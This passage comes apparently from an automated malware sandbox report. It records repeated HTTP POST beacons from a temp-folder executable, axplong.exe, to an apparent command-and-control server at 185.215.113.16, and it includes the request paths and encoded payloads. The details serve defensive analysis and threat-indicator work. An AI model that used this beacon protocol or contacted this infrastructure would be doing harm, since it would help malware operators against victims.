                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.665090185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:35.950443029 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:36.663297892 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:36 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:36.664252043 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:36.892077923 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:36 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.665091185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:37.012895107 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:37.726901054 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:37.727931023 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:37.955261946 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.665092185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:38.075675964 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:38.802963018 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:38.806350946 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:39.039230108 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.665093185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:39.153304100 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:39.862570047 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:39.863419056 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:40.094299078 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.665094185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:40.254718065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:40.922092915 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:40.922971964 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:41.145962000 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.665095185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:41.262888908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:41.980412960 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:41.981540918 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:42.213536024 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:42 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.665096185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:42.325505972 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:43.016122103 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:42 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:43.049483061 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:43.271697044 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:43 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.665097185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:43.403157949 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:44.153584957 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:43 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:44.154489040 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:44.378087044 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.665098185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:44.497486115 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:45.207119942 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:45.208024025 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:45.434211016 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.665099185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:45.545962095 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:46.252923965 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:46.255951881 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:46.488704920 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.665100185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:46.607590914 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:47.302988052 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:47.304413080 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:47.526633978 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


